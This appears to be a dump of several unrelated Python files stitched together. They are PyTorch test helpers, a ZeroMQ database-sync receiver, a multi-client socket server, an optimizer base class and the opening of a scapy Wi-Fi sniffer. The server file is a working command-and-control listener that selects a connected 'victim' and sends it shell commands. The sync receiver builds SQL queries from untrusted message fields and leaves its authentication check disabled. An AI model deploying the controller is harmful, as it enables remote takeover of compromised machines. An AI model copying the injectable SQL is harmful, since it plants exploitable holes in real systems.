t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
# we don't need need to sort S
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
# FIXME: remove this by updating test suites using it
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
# FIXME: remove this by updating test suites using it
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# FIXME: improve load_tests() documentation here
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
# FIXME: document this and move it to test_serialization
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0") == "1":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0") == "1":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# FIXME: delete this
# Using @toleranceOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
# FIXME: move to test_sparse or sparse utils
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if condition:
if IS_SANDCASTLE:
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return wrapper
else:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbance that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
# OpInfo utils
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
@contextmanager
def custom_op(opname, symbolic_fn, opset_version):
"""Context manager/decorator to test ONNX export with custom oeprator"""
try:
register_custom_op_symbolic(opname, symbolic_fn, opset_version)
yield
finally:
unregister_custom_op_symbolic(opname, opset_version)
|
sink.py | import sys
import time
import datetime
import zmq
import json
from encryption import AES256
import env as env
from DatabaseConnection import DatabaseConnection
from systemlog import SystemLog
from inbox import Inbox
from outbox import Outbox
import os
from threading import Thread
class Sink:
data = None
def __init__(self, dbhost, dbusername, dbpass, dbname, sinkaddr, skey, ivkey):
self.key = skey
self.iv = ivkey
self.context = zmq.Context()
self.receiver = self.context.socket(zmq.PULL)
self.receiver.bind(sinkaddr)
self.syslog = SystemLog()
self.db = DatabaseConnection(
dbhost, dbusername, dbpass, dbname)
self.inbox = Inbox(self.db)
self.outbox = Outbox(self.db)
def recv_json(self):
msg = self.receiver.recv_json()
enc = AES256()
try:
plain = json.loads(enc.decrypt(self.iv, msg['data'], self.key))
except json.decoder.JSONDecodeError as identifier:
return {
'error': 'Invalid secret key or IV key'
}
msg['data'] = plain[0]
self.data = msg
return msg
def auth(self):
if(int(self.data['sender_id']) != int(self.data['data']['sender_id'])):
return False
return True
def recvAck(self, data):
conn = DatabaseConnection(
env.DB_HOST, env.DB_UNAME, env.DB_PASSWORD, env.DB_NAME)
obox = conn.executeFetchOne(
f"select * from tb_sync_outbox where outbox_id = {data['query']}")
ack = True
if(obox['data']):
if (obox['data']['msg_type'] == 'INS'):
status = 'need_pk_update'
else:
status = 'arrived'
# ack = self.outbox.update(data={
# 'status': status
# }, where_clause={
# 'outbox_id': data['query']
# })
ack = conn.executeCommit(
f"update tb_sync_outbox set status='{status}' where outbox_id={data['query']}")
sink = Sink(env.DB_HOST, env.DB_UNAME, env.DB_PASSWORD,
env.DB_NAME, env.SINK_ADDR, env.SECRET_KEY, env.IV_KEY)
while True:
s = sink.recv_json()
# print(s)
print("------------------------")
if ('error' in s):
print("Status: Invalid secret key or IV ke")
print(s)
else:
print(f"MSG ID: {s['data']['msg_id']}")
print(f"Type: {s['data']['msg_type']}")
# authenticate message
# if(not sink.auth()):
# continue
# sink.db.connect()
# check msg apakah pesan tersebut sudah pernah masuk
# atau tidak
accepted = False
if (s['data']['msg_type'] != 'ACK'):
checkMsgQuery = """
select ifnull(count(*), 0) as total from tb_sync_inbox where msg_id = {} and client_unique_id = {}
"""
checkMsg = sink.db.executeFetchOne(sql=checkMsgQuery.format(
s['data']['msg_id'], s['data']['client_unique_id']))
if(checkMsg['execute_status']):
if(checkMsg['data']['total'] <= 0):
accepted = True
else:
sink.syslog.insert(
"accepted-msg", "Execute Error: {}".format(checkMsg['error_data']['msg']))
else:
checkMsgQuery = """
select ifnull(count(*), 0) as total from tb_sync_inbox where msg_type = 'ACK' and client_unique_id = {} and query='{}'
"""
checkMsg = sink.db.executeFetchOne(sql=checkMsgQuery.format(
s['data']['client_unique_id'], s['data']['query']))
if(checkMsg['execute_status']):
if(checkMsg['data']['total'] <= 0):
accepted = True
# insert message to db
print("Status: ", end="")
if (accepted):
# print(s['data'])
if (s['data']['msg_type'] == 'ACKS'):
thread = Thread(target=sink.recvAck, args=(s['data'],))
thread.start()
else:
insert = sink.inbox.insert(s['data'])
if (not insert):
print(sink.db.getLastCommitError())
# sql = """
# insert into tb_sync_inbox(row_id, table_name, msg_id, `query`, `msg_type`, client_unique_id, master_status, occur_at, first_time_occur_at)
# values({}, "{}", {},"{}", "{}", {}, {}, {}, {})
# """
# insert = sink.db.executeCommit(autoconnect=False, sql=sql.format(
# s['data']['row_id'], s['data']['table_name'], s['data']['msg_id'], s['data']['data'], s['data']['msg_type'], s['data']['sender_id'], s['data']['master_status'], s['data']['unix_timestamp']))
print('Accepted')
else:
print('Rejected')
# send back which message is received using worker
# only reply non-ACK msg
if(s['data']['msg_type'] != 'ACK' and s['data']['msg_type'] != 'REG'):
data = s['data']
sink.outbox.insert(data={
'row_id': 0,
'table_name': data['table_name'],
'msg_type': 'ACK',
'query': data['msg_id'],
'client_unique_id': data['client_unique_id'],
'msg_id': 0,
'priority': 1
})
# print("end time: {}".format(int(round(time.time() * 1000))))
|
server_multi_new.py | import socket
import sys
import threading
import time
from queue import Queue
NUMBER_OF_THREADS = 2
JOB_NUMBER = [1, 2]
queue = Queue()
all_connections = []
all_address = []
# Create a Socket ( connect two computers)
def create_socket():
try:
global host
global port
global s
host = ""
port = 9998
s = socket.socket()
except socket.error as msg:
print("Socket creation error: " + str(msg))
# Binding the socket and listening for connections
def bind_socket():
try:
global host
global port
global s
print("Binding the Port: " + str(port))
s.bind((host, port))
s.listen(5)
except socket.error as msg:
print("Socket Binding error" + str(msg) + "\n" + "Retrying...")
bind_socket()
# Handling connection from multiple clients and saving to a list
# Closing previous connections when server.py file is restarted
def accepting_connections():
for c in all_connections:
c.close()
del all_connections[:]
del all_address[:]
while True:
try:
conn, address = s.accept()
s.setblocking(1) # prevents timeout
all_connections.append(conn)
all_address.append(address)
print("Connection has been established :" + address[0])
except:
print("Error accepting connections")
# 2nd thread functions - 1) See all the clients 2) Select a client 3) Send commands to the connected client
# Interactive prompt for sending commands
# turtle> list
# 0 Friend-A Port
# 1 Friend-B Port
# 2 Friend-C Port
# turtle> select 1
# 192.168.0.112> dir
def start_turtle():
while True:
cmd = input('turtle> ')
if cmd == 'list':
list_connections()
elif 'select' in cmd:
conn = get_target(cmd)
if conn is not None:
send_target_commands(conn)
elif cmd == 'quit':
print("Bye Bye Host!")
sys.exit()
# break
else:
print("Command not recognized")
# Display all current active connections with client
def list_connections():
results = ''
for i, conn in enumerate(all_connections):
try:
conn.send(str.encode(' '))
conn.recv(20480)
except:
del all_connections[i]
del all_address[i]
continue
results = str(i) + " " + str(all_address[i][0]) + " " + str(all_address[i][1]) + "\n"
print("----Clients----" + "\n" + results)
# Selecting the target
def get_target(cmd):
try:
target = cmd.replace('select ', '') # target = id
target = int(target)
conn = all_connections[target]
print("You are now connected to :" + str(all_address[target][0]))
print(str(all_address[target][0]) + ">", end="")
return conn
# 192.168.0.4> dir
except:
print("Selection not valid")
return None
# Send commands to client/victim or a friend
def send_target_commands(conn):
while True:
try:
cmd = input()
if cmd == 'quit':
break
if len(str.encode(cmd)) > 0:
conn.send(str.encode(cmd))
client_response = str(conn.recv(20480), "utf-8")
print(client_response, end="")
except:
print("Error sending commands")
break
# Create worker threads
def create_workers():
for _ in range(NUMBER_OF_THREADS):
t = threading.Thread(target=work)
t.daemon = True
t.start()
# Do next job that is in the queue (handle connections, send commands)
def work():
while True:
x = queue.get()
if x == 1:
create_socket()
bind_socket()
accepting_connections()
if x == 2:
start_turtle()
queue.task_done()
def create_jobs():
for x in JOB_NUMBER:
queue.put(x)
queue.join()
create_workers()
create_jobs() |
algorithm.py | import numpy as np
import pandas as pd
import attr
import time
from tqdm.auto import tqdm
from optimistic import experiment as objective
from .plotting import Plotter
from threading import Thread
from ipywidgets import Text
from parametric import Parameter
@attr.s
class Algorithm:
''' A base class for parameter space exploration and optimization.
Arguments:
experiment (callable): a function or method which measures the
objective function at the current point in
the parameter space. Takes no positional arguments.
parameters (dict): instances of the parametric.Parameter class to use
during optimization. Defaults to empty, and Parameters
can be added by calling Algorithm.add_parameter().
bounds (dict): tuple bounds indexed by Parameter names. Defaults to empty,
and is set when adding Parameters.
points (dict): optional points for each Parameter to override default
point generation in optimizers, e.g. sampling locations
for a grid search or initial population in a genetic algorithm.
sign (int): choose between maximization (+1) and minimization (-1)
X (2d array): coordinates sampled during optimization. Defaults to empty,
but previous results can be passed (along with results into
the y argument) to speed up some optimizers.
y (1d array): objective function evaluations. Defaults to empty.
threaded (bool): if True, run optimization in a separate thread.
show_progress (bool): whether to display a progress bar during
optimization. Adds <1 ms overhead per iteration.
record_data (bool): whether to store X, y observations. Adds <1 ms overhead per iteration.
display (bool): whether to display optimization status using ipywidgets.
Only works when running in a Jupyter environment.
continuous (bool): whether to quit after convergence/specified number of iterations
or continue running.
'''
experiment = attr.ib(default=None)
parameters = attr.ib(factory=dict)
bounds = attr.ib(factory=dict)
points = attr.ib(factory=dict) # optional overrides to search points
sign = attr.ib(default=1, converter=np.sign)
X = attr.ib(factory=lambda: np.atleast_2d([]))
y = attr.ib(factory=lambda: np.array([]))
threaded = attr.ib(default=False)
show_progress = attr.ib(default=False)
record_data = attr.ib(default=True)
display = attr.ib(default=False)
continuous = attr.ib(default=False)
output = attr.ib(default=None)
def add_parameter(self, parameter, bounds=None, points=None):
''' Adds a parameter.
Arguments:
parameter (parametric.Parameter)
bounds (tuple): a (min, max) pair defining the extent of the
optimization. If no bounds are passed but a set of
points is specified, use the min/max values of
points; otherwise, use the default parameter bounds.
points (array-like): a list of points to override sampling behavior
in the algorithm.
'''
self.parameters[parameter.name] = parameter
if bounds is None:
if points is not None:
self.bounds[parameter.name] = (np.min(points), np.max(points))
elif parameter.bounds == (-np.inf, np.inf):
raise ValueError('Define parameter bounds!')
else:
self.bounds[parameter.name] = parameter.bounds
else:
self.bounds[parameter.name] = bounds
if points is not None: # override point selection
self.points[parameter.name] = points
return self
def check_bounds(self, point):
''' Checks that the point is within the specified bounds '''
i = 0
for name, parameter in self.parameters.items():
bounds = self.bounds[name]
if not bounds[0] <= point[i] <= bounds[1]:
raise ValueError(f'The optimizer requested a point outside the valid bounds for parameter {parameter.name} and will now terminate.')
i += 1
def measure(self, point):
''' Actuate to specified point and measure result '''
if self.experiment is None:
raise ValueError('No experiment has been assigned to this optimizer!')
self.check_bounds(point)
new_values = {}
for i, (name, parameter) in enumerate(self.parameters.items()):
new_values[name] = point[i]
if isinstance(self.experiment, Parameter):
result = objective(self.experiment)(optimizer=self, **new_values) # manually wrap
else:
result = self.experiment(optimizer=self, **new_values)
if self.record_data:
if len(self.X[0]) == 0:
self.X = np.atleast_2d(point)
else:
self.X = np.append(self.X, np.atleast_2d(point), axis=0)
self.y = np.append(self.y, result)
if self.display:
if self.output is None:
self.output = Text()
display(self.output)
self.output.value = str(point) + ' -> ' + str(result)
return -self.sign*result
@property
def dataset(self):
''' If the optimizer is set to data_format = 'numpy', this converts acquired
data into a pandas.DataFrame.
'''
df = pd.DataFrame(self.X, columns = list(self.parameters.keys()))
df[self.experiment.__name__] = self.y
return df
@objective
def metacost(self):
''' Runs an optimization and returns the integrated cost as an objective
function for meta-optimization. The @objective tag supports passing
any of the optimizer parameters into the metacost evaluation.
'''
# measure original coordinates
original_coordinates = {}
for p in self.parameters.values():
original_coordinates[p.name] = p()
# run experiment and compute integral of objective function
self.data = pd.DataFrame()
self.run()
integrated_cost = self.data[self.experiment.__name__].sum()
# reset coordinates
for p in original_coordinates:
self.parameters[p](original_coordinates[p])
return -integrated_cost
@property
def plot(self):
return Plotter(self)
@classmethod
def study(cls, experiment, parameter, bounds, **kwargs):
''' Launches a 1D optimization of the passed experiment with
the given parameter and bounds. You can include any keyword arguments
you want to pass to the optimizer.
'''
inst = cls(experiment, **kwargs)
inst.add_parameter(parameter, bounds=bounds)
inst.run()
inst.plot.parameter_space(parameter)
return inst
def range(self, iterations):
''' Functions similarly to the built-in range() generator, e.g.
for i in self.range(10):
print(i)
prints integers from 0 to 9. However, if self.continuous==True,
i will be reset to 0 afterwards and the integers will be repeatedly
printed in order until execution is interrupted.
'''
if not self.continuous:
yield from range(1*iterations)
else:
i = 0
while True:
yield i
i = (i+1) % 1*iterations
def iterate(self, lst):
''' Functions similarly to the built-in list() generator, e.g.
for x in [1, 2, 3]:
print(x)
prints 1, 2, and 3. However, if self.continuous==True,
this function will continue to loop through the list values.
If self.show_progress==True, returns a tqdm generator for displaying
a progress bar.
'''
if self.show_progress and not self.continuous:
yield from tqdm(lst)
elif not self.continuous:
yield from list(lst)
else:
i = 0
while True:
yield lst[i]
i = (i+1) % len(lst)
def run(self):
if self.threaded:
Thread(target=self._run).start()
else:
self._run()
|
main.py |
from threading import Thread
import queue
from scapy.all import *
import netifaces
from tabulate import tabulate
import random, os, time
from multiprocessing import Process
def channel_hopper():
while True:
try:
channel = random.randrange(1,15)
os.system("iw dev %s set channel %d" % ("wlxc83a35cef744", channel))
time.sleep(1)
except KeyboardInterrupt:
break
class sniffer(object):
def __init__(self, options):
self.parser_options = options
self.plugins = {}
self._status = False
self._filter = self.parser_options
self.output = []
